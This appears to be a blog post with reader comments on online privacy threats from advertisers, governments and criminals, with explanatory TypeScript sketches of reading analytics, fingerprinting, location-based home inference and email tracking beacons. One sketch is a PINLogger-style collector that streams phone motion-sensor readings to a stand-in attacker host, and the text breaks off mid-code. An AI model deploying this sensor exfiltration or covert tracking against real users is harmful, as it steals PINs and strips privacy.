There are four main types of entity motivated to violate your privacy:
- Companies: can monetize this information directly, by selling it, and indirectly, by exploiting it in their internal business. Tim Wu's The Attention Merchants: The Epic Scramble to Get Inside Our Heads is a valuable overview of this process, as is Maciej Cegłowski's What Happens Next Will Amaze You.
- Governments: both democratic and authoritarian governments at all levels from nations to cities are addicted to violating the privacy of citizens and non-citizens alike, ostensibly in order to "keep us safe", but in practice more to avoid loss of power. Parts of Wu's book cover this too, but at least since Snowden's revelations it has rarely been far from the headlines.
- Criminals: can be even more effective at monetizing your private information than companies.
- Users: you are motivated to give up your privacy for trivial rewards:
More than 70% of people would reveal their computer password in exchange for a bar of chocolate, a survey has found.
Companies
Cliff Lynch has a long paper up at First Monday entitled The rise of reading analytics and the emerging calculus of reader privacy in the digital world:

It discusses what data is being collected, to whom it is available, and how it might be used by various interested parties (including authors). I explore means of tracking what’s being read, who is doing the reading, and how readers discover what they read.

Many months ago Cliff asked me to review a draft, but the final version differs significantly from the draft I reviewed. Cliff divides the paper into four sections:
- Introduction: Who’s reading what, and who knows what you’re reading?
- Collecting data
- Exploiting data
- Some closing thoughts
Cliff agrees in less dramatic language with Maciej Cegłowski's Haunted by Data, and his analogy between stored data and nuclear waste:
Those trying to protect reader privacy gradually realized that the best guarantee of such privacy was to collect as little data as possible, and to retain what had to be collected as briefly as possible. The hard won lesson: if it exists, it will ultimately be subpoenaed or seized, and used against readers in steadily less measured and discriminating ways over time.

Cliff notices, as did Sam Kome, that readers are now tracked at the page level:
One of the byproducts of this transformation is a major restructuring of ideas and assumptions about reader privacy in light of the availability of information about what is being read, who is reading it, and (a genuinely new development) exactly how it is being read, including the end to frustrating reliance upon purchase, borrowing, or downloading as surrogate indicators for actually reading the work in question. ... one might wish for more than sparse anecdote on the ways and extents to which very detailed data on how a given book is (or is not) read, and by whom, actually benefits the various interested parties: authors, publishers, retailers, platform providers, and even readers.
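To make concrete what this kind of page-level instrumentation looks like, here is a minimal sketch of the telemetry Cliff describes. The /reading-events endpoint and the data-section markup are invented for illustration; e-book platforms do the equivalent inside their reader apps:

```typescript
// Minimal sketch of page-level reading analytics (endpoint and markup are invented).
// Each element marked data-section reports how long it was actually in the viewport.
const dwell = new Map<string, number>();
const entered = new Map<string, number>();

const observer = new IntersectionObserver((entries) => {
  for (const entry of entries) {
    const id = (entry.target as HTMLElement).dataset.section ?? "unknown";
    if (entry.isIntersecting) {
      entered.set(id, performance.now());
    } else if (entered.has(id)) {
      const seconds = (performance.now() - entered.get(id)!) / 1000;
      dwell.set(id, (dwell.get(id) ?? 0) + seconds);
      entered.delete(id);
    }
  }
}, { threshold: 0.5 });

document.querySelectorAll<HTMLElement>("[data-section]").forEach((el) => observer.observe(el));

// When the reader leaves, ship per-section dwell times to the analytics server.
window.addEventListener("pagehide", () => {
  navigator.sendBeacon("/reading-events", JSON.stringify(Object.fromEntries(dwell)));
});
```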
Cliff points out an important shift in the rhetoric about privacy:

Historically, most of the language has been about competing values and how they should be prioritized and balanced, using charged and emotional phrases: “reader privacy,” “intellectual freedom,” “national security,” “surveillance,” “accountability,” “protecting potential victims” ... These conversations are being supplanted by a sterile and anodyne, value-free discussion of “analytics:” reader analytics, learning analytics, etc. These are presented as tools that smart and responsible modern organizations are expected to employ; indeed, not doing analytics is presented as suggesting some kind of management failure or incompetence in many quarters. The operation of analytics systems, ... tends to shift discussions from whether data should be collected to what we can do with it, and further suggests that if we can do something with it, we should.

Privacy is among the reasons readers have for using ad-blockers; the majority of the bytes they eliminate are devoted not to showing you ads but to implementing trackers. The Future of Ad Blocking: An Analytical Framework and New Techniques by Grant Storey, Dillon Reisman, Jonathan Mayer and Arvind Narayanan reports on several new ad-blocking technologies, including one based on laws against misleading advertising:
ads must be recognizable by humans due to legal requirements imposed on online advertising. Thus we propose perceptual ad blocking which works radically differently from current ad blockers. It deliberately ignores useful information in markup and limits itself to visually salient information, mimicking how a human user would recognize ads. We use lightweight computer vision techniques to implement such a tool and show that it defeats attempts to obfuscate the presence of ads.

They are optimistic that ad-blockers will win out:
Our second key observation is that even though publishers increasingly deploy scripts to detect and disable ad blocking, ad blockers run at a higher privilege level than such scripts, and hence have the upper hand in this arms race. We borrow ideas from rootkits to build a stealthy adblocker that evades detection. Our approach to hiding the presence and purpose of a browser extension is general and might be of independent interest.

I don't agree. The advent of DRM for the Web requires that the DRM implementation run at a higher privilege level than the ad-blocker, and that it prevent less-privileged code from observing the rendered content (lest it be copied). It is naive to think that advertisers will not notice and exploit this capability.
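To make the "perceptual" idea concrete, here is a much-simplified sketch. It stands in for the paper's computer-vision classifier with a crude text match on the ad disclosures ("AdChoices", "Sponsored") that regulations force advertisers to display; the cue list and the container heuristic are mine, not the authors':

```typescript
// Much-simplified sketch of perceptual ad blocking: ignore markup, look for the
// human-visible ad disclosures that the law requires, and hide their containers.
// The cue list and the container heuristic are illustrative only.
const AD_CUES = ["adchoices", "sponsored", "advertisement"];

function isVisible(el: HTMLElement): boolean {
  const style = getComputedStyle(el);
  return style.display !== "none" && style.visibility !== "hidden" && el.offsetHeight > 0;
}

function hidePerceivedAds(): void {
  for (const el of Array.from(document.querySelectorAll<HTMLElement>("a, span, img"))) {
    const label = (el.innerText || el.getAttribute("alt") || "").trim().toLowerCase();
    if (!isVisible(el) || !AD_CUES.includes(label)) continue;
    // Walk up to a plausible ad container and blank it out.
    const container = el.closest<HTMLElement>("div, section, aside") ?? el;
    container.style.setProperty("display", "none", "important");
  }
}

hidePerceivedAds();
```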
Governments
As usual, Maciej Cegłowski describes the situation aptly:

We're used to talking about the private and public sector in the real economy, but in the surveillance economy this boundary doesn't exist. Much of the day-to-day work of surveillance is done by telecommunications firms, which have a close relationship with government. The techniques and software of surveillance are freely shared between practitioners on both sides. All of the major players in the surveillance economy cooperate with their own country's intelligence agencies, and are spied on (very effectively) by all the others.

Steven Bellovin, Matt Blaze, Susan Landau and Stephanie Pell have a 101-page review of the problems caused by the legacy model of communication underlying surveillance law in the Harvard Journal of Law and Technology entitled It's Too Complicated: How the Internet Upends Katz, Smith, and Electronic Surveillance Law. It's clearly important, but I'm only a short way into it; I may have more to say about it later.
And this, of course, assumes that the government abides by the law. Marcy Wheeler disposes of that idea:
All of which is to say that the authority that the government has been pointing to for years to show how great Title VII is is really a dumpster fire of compliance problems.

and also:
And still, we know very little about how this authority is used.
one reason NSA analysts were collecting upstream data is because over three years after DOJ and ODNI had figured out analysts were breaking the rules because they forgot to exclude upstream from their search, they were still doing so. Overseers noted this back in 2013!
Criminals
The boundaries between government entities such as intelligence agencies and law enforcement and criminals have always been somewhat fluid. The difficulty of attributing activity on the Internet (also here) to specific actors has made them even more fluid:

Who did it? Attribution is fundamental. Human lives and the security of the state may depend on ascribing agency to an agent. In the context of computer network intrusions, attribution is commonly seen as one of the most intractable technical problems, as either solvable or not solvable, and as dependent mainly on the available forensic evidence. But is it? Is this a productive understanding of attribution? — This article argues that attribution is what states make of it.

The most important things to keep private are your passwords and PINs. They're the primary target for the bad guys, who can use them to drain your bank accounts. Dan Goodin at Ars Technica has an example of how incredibly hard it is to keep them secret. In Meet PINLogger, the drive-by exploit that steals smartphone PINs, he reports on Stealing PINs via mobile sensors: actual risk versus user perception by Maryam Mehrnezhad, Ehsan Toreini, Siamak F. Shahandashti and Feng Hao. Goodin writes:
The demonstrated keylogging attacks are most useful at guessing digits in four-digit PINs, with a 74-percent accuracy the first time it's entered and a 94-percent chance of success on the third try. ... The attacks require only that a user open a malicious webpage and enter the characters before closing it. The attack doesn't require the installation of any malicious apps.

Malvertising, using ad servers to deliver malware, is a standard technique for the bad guys, and this attack can use it:
Malicious webpages—or depending on the browser, legitimate sites serving malicious ads or malicious content through HTML-based iframe tags—can mount the attack by using standard JavaScript code that accesses motion and orientation sensors built into virtually all iOS and Android devices. To demonstrate how the attack would work, researchers from Newcastle University in the UK wrote attack code dubbed PINLogger.js. Without any warning or outward sign of what was happening, the JavaScript was able to accurately infer characters being entered into the devices.

The authors are pessimistic about blocking attacks using sensor data:
"That means whenever you are typing private data on a webpage [with] some advert banners ... the advert provider as part of the page can 'listen in' and find out what you type in that page," ... "Or with some browsers as we found, if you open a page A and then another page B without closing page A (which most people do) page A in the background can listen in on what you type in page B."
Access to mobile sensor data via JavaScript is limited to only a few sensors at the moment. This will probably expand in the future, specially with the rapid development of sensor-enabled devices in the Internet of things (IoT). ... Many of the suggested academic solutions either have not been applied by the industry as a practical solution, or have failed. Given the results in our user studies, designing a practical solution for this problem does not seem to be straightforward. ... After all, it seems that an extensive study is required towards designing a permission framework which is usable and secure at the same time. Such research is a very important usable security and privacy topic to be explored further in the future.

The point is not to focus on this particular channel, but to observe that it is essentially impossible to enumerate and block all the channels by which private information can leak from any computer connected to the Internet.
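For concreteness, here is a sketch of the collection half of such an attack: any script in the page, including one delivered by an ad, could at the time subscribe to the motion and orientation sensors without any permission prompt and stream the readings elsewhere. The classifier that turns readings into digits is the researchers' contribution and is not shown; the collector URL is invented, and browsers have since started gating these sensors behind permissions:

```typescript
// Sketch of the data-collection side of a PINLogger-style attack. Turning the
// readings into PIN digits (the hard part) is done offline and is not shown.
// "https://collector.example" is a made-up attacker endpoint.
type Reading = { t: number; ax: number | null; ay: number | null; az: number | null; alpha: number | null };
const readings: Reading[] = [];
let lastAlpha: number | null = null;

window.addEventListener("deviceorientation", (e) => {
  lastAlpha = e.alpha; // device rotation, sampled alongside acceleration
});

window.addEventListener("devicemotion", (e) => {
  const a = e.accelerationIncludingGravity;
  readings.push({ t: e.timeStamp, ax: a?.x ?? null, ay: a?.y ?? null, az: a?.z ?? null, alpha: lastAlpha });
  if (readings.length >= 200) {
    // Ship a batch of sensor readings to the attacker for offline classification.
    navigator.sendBeacon("https://collector.example/motion", JSON.stringify(readings.splice(0)));
  }
});
```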
Users
Because it is effectively impossible for you to know what privacy risks you are running, you are probably the main violator of your privacy on the Internet, for two main reasons:
- You have explicitly and implicitly agreed to Terms of Service (and here) that give up your privacy rights in return for access to content. Since the content probably isn't that important to you, your privacy can't be that important either.
- You have not taken the simple precautions necessary to maintain privacy by being anonymous when using the Web. Techniques such as cookie syncing and browser fingerprinting (sketched below) mean that even using Tor isn't enough. Even though Tor obscures your IP address, if you're using the same browser as you did without Tor or when you logged in to a site, the site will know it's you. Fortunately, there is a very simple way to avoid these problems. Tails (The Amnesic Incognito Live System) can be run from a USB flash drive or in a VM. Every time it starts up it is in a clean state. The browser looks the same to a Web site as every other Tails browser. Use it any time privacy is an issue, from watching pr0n to searching for medical information.
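As an illustration of why an ordinary browser gives you away, here is a sketch of one classic fingerprinting signal: detecting installed fonts by measuring text width. Real trackers combine dozens of such signals, which is exactly what Tails' uniform browser configuration is designed to defeat. The font list is arbitrary:

```typescript
// Sketch of font-based fingerprinting: a font is "installed" if rendering the same
// string with it (falling back to monospace) changes the measured width.
function detectFonts(candidates: string[]): string[] {
  const ctx = document.createElement("canvas").getContext("2d")!;
  const probe = "mmmmmmmmmmlli";
  const widthWith = (font: string): number => {
    ctx.font = `72px ${font}`;
    return ctx.measureText(probe).width;
  };
  const baseline = widthWith("monospace");
  return candidates.filter((f) => widthWith(`"${f}", monospace`) !== baseline);
}

// One more component for the tracker's device fingerprint.
console.log("fonts:", detectFonts(["Calibri", "Helvetica Neue", "Ubuntu", "Roboto"]).join(","));
```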
Update:
At The Atlantic, Arvind Narayanan and Dillon Reisman's The Thinning Line Between Commercial and Government Surveillance reports:

As part of the Princeton Web Transparency and Accountability Project, we’ve been studying who tracks you online and how they do it. Here’s why we think the fight over browsing histories is vital to civil liberties and to a functioning democracy.

They stress the effectiveness of the tracking techniques I mentioned above:
Privacy doesn’t merely benefit individuals; it fundamentally shapes how society functions. It is crucial for marginalized communities and for social movements, such as the fight for marriage equality and other once-stigmatized views. Privacy enables these groups to network, organize, and develop their ideas and platforms before challenging the status quo. But when people know they’re being tracked and surveilled, they change their behavior. This chilling effect hurts our intellectual freedoms and our capacity for social progress.
Web tracking today is breathtaking in its scope and sophistication. There are hundreds of entities in the business of following you from site to site, and popular websites embed about 50 trackers on average that enable such tracking. We’ve also found that just about every new feature that’s introduced in web browsers gets abused in creative ways to “fingerprint” your computer or mobile device. Even identical looking devices tend to behave in subtly different ways, such as by supporting different sets of fonts. It’s as if each device has its own personality. This means that even if you clear your cookies or log out of a website, your device fingerprint can still give away who you are.

And that, even when these techniques are deployed by companies, governments (and ISPs) can piggy-back on them:
Worse, the distinction between commercial tracking and government surveillance is thin and getting thinner. The satirical website The Onion once ran a story with this headline: “CIA's ‘Facebook’ Program Dramatically Cut Agency's Costs.” Reality isn’t far off. The Snowden leaks revealed that the NSA piggybacks on advertising cookies, and in a technical paper we showed that this can be devastatingly effective. Hacks and data breaches of commercial systems have also become a major part of the strategies of nation-state actors.

Ironically, The Atlantic's web-site is adding tracking information to their article's URL (note the 524952):
https://www.theatlantic.com/technology/archive/2017/05/the-thinning-line-between-commercial-and-government-surveillance/524952/

and to the attributes of the links in it:
data-omni-click="r'article',r'link',r'6',r'524952'"

At Gizmodo, Kashmir Hill's Uber Doesn’t Want You to See This Document About Its Vast Data Surveillance System is a deep dive into the incredibly detailed information Uber's database maintains about each and every Uber user. It is based on information briefly revealed in a wrongful termination lawsuit, before Uber's lawyers got it sealed.
For two days in October, before Uber convinced the court to seal the material, one of Spangenberg’s filings that was publicly visible online included a spreadsheet listing more than 500 pieces of information that Uber tracks for each of its users. ...

For example, users give Uber access to their location and payment information; Uber then slices and dices that information in myriad ways. The company holds files on the GPS points for the trips you most frequently take; how much you’ve paid for a ride; how you’ve paid for a ride; how much you’ve paid over the past week; when you last canceled a trip; how many times you’ve cancelled in the last five minutes, 10 minutes, 30 minutes, and 300 minutes; how many times you’ve changed your credit card; what email address you signed up with; whether you’ve ever changed your email address.

Both articles are must-reads.
Continuing the theme of how difficult it is to protect your privacy, today's contribution is Stealing Windows credentials using Google Chrome by Bosko Stankovic:
ReplyDelete"This article describes an attack which can lead to Windows credentials theft, affecting the default configuration of the most popular browser in the world today, Google Chrome, as well as all Windows versions supporting it."
I'm a big fan of Maciej Cegłowski's barn-burning speeches. The one he gave at re:publica 2017 on May 10 is absolutely a must-watch for anyone concerned about privacy.
Maciej Cegłowski's text is here. Some key quotes:
ReplyDelete"Facebook is the dominant social network in Europe, with 349 million monthly active users. Google has something like 94% of market share for search in Germany. The servers of Europe are littered with the bodies of dead and dying social media sites. The few holdouts that still exist, like Xing, are being crushed by their American rivals.
In their online life, Europeans have become completely dependent on companies headquartered in the United States.
And so Trump is in charge in America, and America has all your data. This leaves you in a very exposed position. US residents enjoy some measure of legal protection against the American government. Even if you think our intelligence agencies are evil, they’re a lawful evil. They have to follow laws and procedures, and the people in those agencies take them seriously.
But there are no such protections for non-Americans outside the United States. The NSA would have to go to court to spy on me; they can spy on you anytime they feel like it. ... And now those corporations have to deal with Trump. How hard do you think they’ll work to defend European interests?"
and:
"Part of this concentration is due to network effects, but a lot of it is driven by the problem of security. If you want to work online with any measure of convenience and safety, you must choose a feudal lord who is big enough to protect you."
and:
"Each of the big five companies, with the important exception of Apple, has made aggressive user surveillance central to its business model. This is a dilemma of the feudal internet. We seek protection from these companies because they can offer us security. But their business model is to make us more vulnerable, by getting us to surrender more of the details of our lives to their servers, and to put more faith in the algorithms they train on our observed behavior.
These algorithms work well, and despite attempts to convince us otherwise, it’s clear they work just as well in politics as in commerce. So in our eagerness to find safety online, we’ve given this feudal Internet the power to change our offline world in unanticipated and scary ways."
Google now has visibility into your offline credit-card transactions:
ReplyDelete"Google has begun using billions of credit-card transaction records to prove that its online ads are prompting people to make purchases – even when they happen offline in brick-and-mortar stores, the company said Tuesday.
The advance allows Google to determine how many sales have been generated by digital ad campaigns, a goal that industry insiders have long described as “the holy grail” of online advertising. But the announcement also renewed long-standing privacy complaints about how the company uses personal information.
To power its multibillion-dollar advertising juggernaut, Google already analyzes users’ Web browsing, search history and geographic locations, using data from popular Google-owned apps like YouTube, Gmail, Google Maps and the Google Play store. All that information is tied to the real identities of users when they log into Google’s services.
The new credit-card data enables the tech giant to connect these digital trails to real-world purchase records in a far more extensive way than was possible before."
A newly discovered ad-blocker-aware malvertising campaign called RoughTed is in the wild:
ReplyDelete"Traffic comes from thousands of publishers, some ranked in Alexa's top 500 websites. Contaminated domains accumulated over half a billion visits in the past three months alone, according to security firm Malwarebytes."
Details from Malwarebytes here.
See also Is Privacy Still a Big Deal Today? by Kartik Hosanagar and Tai Bendit from the Wharton School:
ReplyDelete"To address the [ad-blocker] issue, the Interactive Advertising Bureau (IAB), an advertising industry organization, has proposed the LEAN advertising program.
LEAN — an acronym for light, encrypted, ad choice supported, non-invasive ads — suggests a number of guidelines aimed at protecting user privacy and improving their overall experience with interactive ads. Among the guidelines is the expectation of compliance with the Digital Advertising Alliance’s consumer privacy program. It’s too soon to tell whether LEAN will be widely adopted, but the initiative shows how consumers can take control and get the industry to take action."
Riiiight.
At The Register, Thomas Claburn's In detail: How we are all pushed, filed, stamped, indexed, briefed, debriefed or numbered – by online biz all day discusses a report from Cracked Labs on surveillance capitalism:
ReplyDelete"Among poker players, it's commonly understood that if you look around the table and you don't see the sucker, it's you. The situation is the same in the knowledge economy because you can't see anything. There's almost no transparency into how data gets bought, sold, and used to make decisions that affect people's lives. When people make decisions about the information they share, they seldom understand how that data will be used or how it might affect them."
At The Register, John Leyden's Banking websites are 'littered with trackers' ogling your credit risk discusses a report from eBlocker:
ReplyDelete"A new study has warned that third-party trackers litter banking websites and the privacy-invading tech is being used to rate surfers' creditworthiness.
Among the top 10 financial institution websites visited in the US and UK, there are 110 third-party trackers snooping on surfers each time they visit."
Cory Doctorow at Boing Boing points me to Paul Farrell's The Medicare machine: patient details of 'any Australian' for sale on darknet:
ReplyDelete"The price for purchasing an Australian’s Medicare card details is 0.0089 bitcoin, which is equivalent to US$22.
Guardian Australia has verified that the seller is making legitimate Medicare details of Australians available by requesting the data of a Guardian staff member.
The darknet vendor says they are “exploiting a vulnerability which has a much more solid foundation which means not only will it be a lot faster and easier for myself, but it will be here to stay. I hope, lol.”
The listing continues: “Purchase this listing and leave the first and last name, and DOB of any Australian citizen, and you will receive their Medicare patient details in full.”
The vendor said they would soon create a “mass batch requesting of details”.
The seller is listed as a highly trusted vendor on the site and has received dozens of positive sale reviews."
Note that what is for sale in Australia is not a patient's medical record, just the details on the Medicare card, which enable identity theft.
Thomas Claburn's Revealed: The naughty tricks used by web ads to bypass blockers looks at the arms race between advertisers and users:
ReplyDelete"The company's technology disguises third-party network requests so they appear to be first-party network requests. This allows ad services used by website publishers to place cookies and serve ads that would otherwise by blocked by the browser's same-origin security model."
And:
"Uponit provides publishing clients with JavaScipt code that attempts to bypass content blocking. "Our JavaScript detects all blocked ad calls, fully recreates them (including targeting) and communicates them to our servers through a secure, undetectable channel that bypasses ad blockers," the company explains on its website."
From the user's point of view, these are all malware. The companies' excuses for peddling malware are an entertaining read.
Cliff Lynch points me to Jonathan Albright's Who Hacked the Election? Ad Tech did. Through “Fake News,” Identity Resolution and Hyper-Personalization which reveals that fringe "fake news" and propaganda sites are simply fronts for major AdTech companies such as Facebook, Acxiom, Google and a host of smaller, less well-known companies:
ReplyDelete"The conclusion: While this set of “fake news” sites might not have the sheer quantity of ad tech that, say, the Alexa 500 have, the behavioral targeting and identity resolution technologies associated with many of these conspiracy, hyper-partisan, and propaganda sites are as sophisticated as it gets.
Facebook Custom Audiences — near the center of the graph above — for example, can be used to easily target voters in real life based on curated lists from something as simple as an Excel workbook. But most often this is done professionally through a “trusted data partner” like Acxiom (alarming, since example #1, the “LiveRamp” tracker above, is part of the same company)"
It isn't as if all this Web advertising actually works. At The Register Thomas Claburn writes:
ReplyDelete"'It's about 60 to 100 per cent fraud, with an average of 90 per cent, but it is not evenly distributed,' said Augustine Fou, an independent ad fraud researcher, in a report published this month.
... Among quality publishers, Fou reckons $1 spent buys $0.68 in ads actually viewed by real people. But on ad networks and open exchanges, fraud is rampant.
With ad networks, after fees and bots – which account for 30 per cent of traffic – are taken into account, $1 buys $0.07 worth of ad impressions viewed by real people. With open ad exchanges – where bots make up 70 per cent of traffic – that figure is more like $0.01. In other words, web adverts displayed via these networks just aren't being seen by actual people, just automated software scamming advertisers."
Mark St. Cyr asks Is Facebook Staring Down Its “AOL Moment?”, pointing out that once AOL jumped the shark its collapse was rapid. He notes that:
ReplyDelete"Facebook is, for all intents and purposes, an advertising tool for advertisers only. It derives nearly all its revenue from advertisers. i.e., If there’s no advertisers buying on Facebook – there’s no Facebook."
And that it isn't merely the world's biggest advertiser who is backing away:
"The first shot across the proverbial bow was ... when P&G™ announced it was pulling ad dollars from what was considered FB’s ultimate ad model and raison d’être, i.e., targeted ads. The reason? All that targeting (via all that charged-for data) wasn’t hitting the mark."
But also the world's biggest ad agency:
"This past week none other that WPP™, which just so happens to be the world’s largest ad company, stock value plummeted after reporting dismal earnings, and “terrible” guidance."
At Techdirt, Karl Bode reports that:
ReplyDelete"A new study out of Princeton recently constructed a fake home, filled it with real IOT devices, and then monitored just how much additional data an ISP could collect on you based in these devices' network traffic. Their findings? It's relatively trivial for ISPs to build even deeper behavior profiles on you based on everything from your internet-connected baby monitor to your not so smart vibrator."
And notes that even using a VPN doesn't help much.
Alexander Muse claims in How the NSA Identified Satoshi Nakamoto that the agency did it using stylometry:
ReplyDelete"Satoshi has taken great care to keep his identity secret employing the latest encryption and obfuscation methods in his communications. Despite these efforts (according to my source at the DHS) Satoshi Nakamoto gave investigators the only tool they needed to find him — his own words.
Using stylometry one is able to compare texts to determine authorship of a particular work. Throughout the years Satoshi wrote thousands of posts and emails and most of which are publicly available. According to my source, the NSA was able to use the ‘writer invariant’ method of stylometry to compare Satoshi’s ‘known’ writings with trillions of writing samples from people across the globe."
So, not just privacy but pseudonymity is dead.
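For the curious, the core of the "writer invariant" idea is simple enough to sketch: reduce each text to its author's habitual use of function words and compare the resulting vectors. The word list and sample strings below are placeholders; real attribution uses far richer features and vastly more text, but the privacy lesson is the same: your prose is a biometric.

```typescript
// Toy sketch of "writer invariant" stylometry: function-word frequency vectors
// compared by cosine similarity. Word list and sample texts are placeholders.
const FUNCTION_WORDS = ["the", "of", "and", "to", "a", "in", "that", "is", "it", "for", "but", "which"];

function styleVector(text: string): number[] {
  const words = text.toLowerCase().match(/[a-z']+/g) ?? [];
  const total = Math.max(words.length, 1);
  return FUNCTION_WORDS.map((w) => words.filter((x) => x === w).length / total);
}

function cosine(a: number[], b: number[]): number {
  const dot = a.reduce((sum, x, i) => sum + x * b[i], 0);
  const norm = (v: number[]) => Math.sqrt(v.reduce((sum, x) => sum + x * x, 0));
  return dot / (norm(a) * norm(b) || 1);
}

const knownWriting = "placeholder: text known to be by the author of interest";
const candidateWriting = "placeholder: text by a candidate author";

// Scores near 1 suggest similar habits; nowhere near proof of identity on its own.
console.log(cosine(styleVector(knownWriting), styleVector(candidateWriting)));
```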
The title of Karl Bode's CCTV + Lip-Reading Software = Even Less Privacy, Even More Surveillance speaks for itself.
Go read Bruce Schneier's interview with the Harvard Gazette:
ReplyDelete"Consumers are concerned about their privacy and don’t like companies knowing their intimate secrets. But they feel powerless and are often resigned to the privacy invasions because they don’t have any real choice. People need to own credit cards, carry cellphones, and have email addresses and social media accounts. That’s what it takes to be a fully functioning human being in the early 21st century. This is why we need the government to step in."
Catalin Cimpanu combines two of my favorite themes in Malvertising Campaign Mines Cryptocurrency Right in Your Browser:
ReplyDelete"Malware authors are using JavaScript code delivered via malvertising campaigns to mine different cryptocurrencies inside people's browsers, without their knowledge. ... According to a recent report, at least 1.65 million computers have been infected with cryptocurrency mining malware this year so far.
BITAG Announces Technical Review Focused on Internet Data Collection and Privacy:
ReplyDelete"The Broadband Internet Technical Advisory Group (BITAG) will review the technical aspects of Internet of data collection and privacy. This review will result in a report with an anticipated publication date in early 2018."
The incentives for maintaining privacy can't compete with the incentives to leak. By resigning from Equifax, now ex-CEO Richard Smith walks away from the catastrophic breach with as much as $90M:
ReplyDelete"The CEO of Equifax is retiring from the credit reporting bureau with a pay day worth as much as $90 million—or roughly 63 cents for every customer whose data was potentially exposed in its recent security breach."
63 cents is a trivial addition to the costs his incompetence imposed on each of us, so maybe that's OK. But it certainly isn't a way to ensure that future CEOs in charge of our personal information are less careless.
Facebook builds a profile of you that you cannot opt out of, even if you never use Facebook, reports Kashmir Hill at Gizmodo:
ReplyDelete"Behind the Facebook profile you’ve built for yourself is another one, a shadow profile, built from the inboxes and smartphones of other Facebook users. Contact information you’ve never given the network gets associated with your account, making it easier for Facebook to more completely map your social connections."
Privacy Pass is a really interesting development, allowing users to authenticate to services repeatedly without allowing the service to track them:
ReplyDelete"Privacy Pass interacts with supporting websites to introduce an anonymous user-authentication mechanism. In particular, Privacy Pass is suitable for cases where a user is required to complete some proof-of-work (e.g. solving an internet challenge) to authenticate to a service. In short, the extension receives blindly signed ‘passes’ for each authentication and these passes can be used to bypass future challenge solutions using an anonymous redemption procedure. For example, Privacy Pass is supported by Cloudflare to enable users to redeem passes instead of having to solve CAPTCHAs to visit Cloudflare-protected websites.
The blind signing procedure ensures that passes that are redeemed in the future are not feasibly linkable to those that are signed. We use a privacy-preserving cryptographic protocol based on ‘Verifiable, Oblivious Pseudorandom Functions’ (VOPRFs) built from elliptic curves to enforce unlinkability. The protocol is exceptionally fast and guarantees privacy for the user. As such, Privacy Pass is safe to use for those with strict anonymity restrictions."
Tip of the hat to Rebecca Hill at The Register.
The explanation of the Privacy Pass design is quite understandable once you realize that:
ReplyDelete"The security of elliptic curve cryptography depends on the ability to compute a point multiplication and the inability to compute the multiplicand given the original and product points."
No boundaries: Exfiltration of personal data by session-replay scripts is a paper you need to read right now:
ReplyDelete"You may know that most websites have third-party analytics scripts that record which pages you visit and the searches you make. But lately, more and more sites use “session replay” scripts. These scripts record your keystrokes, mouse movements, and scrolling behavior, along with the entire contents of the pages you visit, and send them to third-party servers. Unlike typical analytics services that provide aggregate statistics, these scripts are intended for the recording and playback of individual browsing sessions, as if someone is looking over your shoulder."
Well, Duh! Anonymized location-tracking data proves anything but: Apps squeal on you like crazy:
ReplyDelete"Anonymized location data won't necessarily preserve your anonymity.
M. Keith Chen, associate professor of economics at UCLA's Anderson School of Management, and Ryne Rohla, a doctoral student at Washington State University, accomplished this minor miracle of data science by assuming that the GPS coordinates transmitted by mobile phones between 1am and 4am over several weeks represent the location of device owners' homes."
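The heuristic is simple enough to sketch. Assuming a record layout with latitude, longitude and a timestamp (the field names are mine), the most frequent rounded position seen in the small hours is almost always a home address, no name required:

```typescript
// Sketch of home inference from "anonymized" location pings: the modal ~100 m grid
// cell visited between 1am and 4am is taken to be the device owner's home.
type Ping = { lat: number; lon: number; timestamp: number }; // epoch milliseconds, field names assumed

function inferHome(pings: Ping[]): string | null {
  const counts = new Map<string, number>();
  for (const p of pings) {
    const hour = new Date(p.timestamp).getHours();
    if (hour < 1 || hour >= 4) continue;                      // keep only 1am-4am pings
    const cell = `${p.lat.toFixed(3)},${p.lon.toFixed(3)}`;   // round to a ~100 m grid cell
    counts.set(cell, (counts.get(cell) ?? 0) + 1);
  }
  let best: string | null = null;
  for (const [cell, n] of counts) {
    if (best === null || n > (counts.get(best) ?? 0)) best = cell;
  }
  return best; // one heuristic turns "anonymous" pings into a street address
}
```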
Google collects Android users’ locations even when location services are disabled reports Keith Collins at Quartz:
ReplyDelete"Many people realize that smartphones track their locations. But what if you actively turn off location services, haven’t used any apps, and haven’t even inserted a carrier SIM card?
Even if you take all of those precautions, phones running Android software gather data about your location and send it back to Google when they’re connected to the internet, a Quartz investigation has revealed.
Since the beginning of 2017, Android phones have been collecting the addresses of nearby cellular towers—even when location services are disabled—and sending that data back to Google. The result is that Google, the unit of Alphabet behind Android, has access to data about individuals’ locations and their movements that go far beyond a reasonable consumer expectation of privacy."
Hat tip to Andrew Orlowski at The Register, who writes:
"you may want to consider two questions about a story that goes to the heart of the human relationship with technology: "Who is in control, here?" Firstly, can you turn it off? If you can't turn it off then obviously you are not in control. Secondly, do you know it's happening? If you don't know it's happening, you're not even in a position to turn it off. This entirely changes the terms of that human-machine relationship.
What Google did is also illegal here because consent is the key to data protection in the EU."
The Citizen Lab has a fascinating report on the Ethiopian government's use of commercial spyware from Israeli company Cyberbit to target dissidents, and the company's sales efforts to other unsavory governments.
Brian Merchant's How Email Open Tracking Quietly Took Over the Web shows why you should never read e-mail in HTML, only in plain text. Hat tip to Cory Doctorow:
ReplyDelete" It is routine for companies -- and even individuals -- to send emails with "beacons," transparent, tiny images that have to be fetched from a server. Through these beacons, companies can tell whether you've opened an email, whom you've forwarded it to, and even your location from moment to moment.
The embedding of full-fledged HTML renderers in email and the growth of browser-based email clients mean that the tracking can also be effected through downloadable fonts or other elements -- anything that triggers loading a unique, per-recipient URL from a surveillance marketing company's server.
The surveillance adoption curve means that these techniques have moved from marketing and hackers to individuals, and one analyst's report estimates that 19% of "conversational" email contains trackers."
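The mechanics are as simple as they are invisible: a per-recipient image URL embedded in the HTML. A sketch, with an invented tracking domain and token scheme, is below; the same trick works with fonts, stylesheets or anything else the mail client fetches:

```typescript
// Sketch of an email open-tracking "beacon": the sender embeds a unique 1x1 image per
// recipient; fetching it reveals who opened the mail, when, and from which address.
import { createServer } from "node:http";
import { randomUUID } from "node:crypto";

const opens = new Map<string, string>(); // token -> recipient email address

// Called when composing the mail: returns the beacon tag to embed in the HTML body.
function beaconHtml(recipient: string): string {
  const token = randomUUID();
  opens.set(token, recipient);
  return `<img src="https://track.example/open/${token}.gif" width="1" height="1" alt="">`;
}

console.log(beaconHtml("recipient@example.com")); // paste into the outgoing HTML mail

createServer((req, res) => {
  const token = req.url?.match(/^\/open\/([0-9a-f-]+)\.gif$/)?.[1];
  if (token && opens.has(token)) {
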